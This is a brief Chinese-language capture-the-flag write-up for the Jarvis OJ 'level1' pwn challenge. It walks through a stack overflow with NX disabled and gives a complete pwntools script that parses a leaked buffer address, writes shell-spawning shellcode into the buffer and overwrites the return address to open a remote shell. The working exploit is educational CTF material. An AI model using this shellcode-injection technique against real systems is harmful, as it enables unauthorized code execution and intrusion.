level1
checksec看一下保护,几乎没什么保护措施:
先拖进IDA里面看一下(f5大法好),发现栈溢出点:
f12没发现"/bin/sh",看一下printf函数会把buf的地址输出出来,我们将它截取,并保存在buf_addr中。由于NX是关闭的状态,也就是说我们把shellcode写进buf里面,函数返回时跳转回buf的位置,就可以执行shellcode了。因此我们把shellcode的代码从buf的起始地址开始填充,然后buf中剩下的地址由a填充,因为我们最后需要调用shellcode代码,因此再加上buf_addr(记得将之字符化)
上脚本:
from pwn import *
p = remote('pwn2.jarvisoj.com', 9877)
#p = process("./level1")
text = p.recvline()[14:-2]
print text[14:-2]
buf_addr = int(text, 16)
shellcode = asm(shellcraft.sh())
payload = shellcode + 'a' * (0x88+4-len(shellcode)) + p32(buf_addr)
p.send(payload)
p.interactive()得到flag:
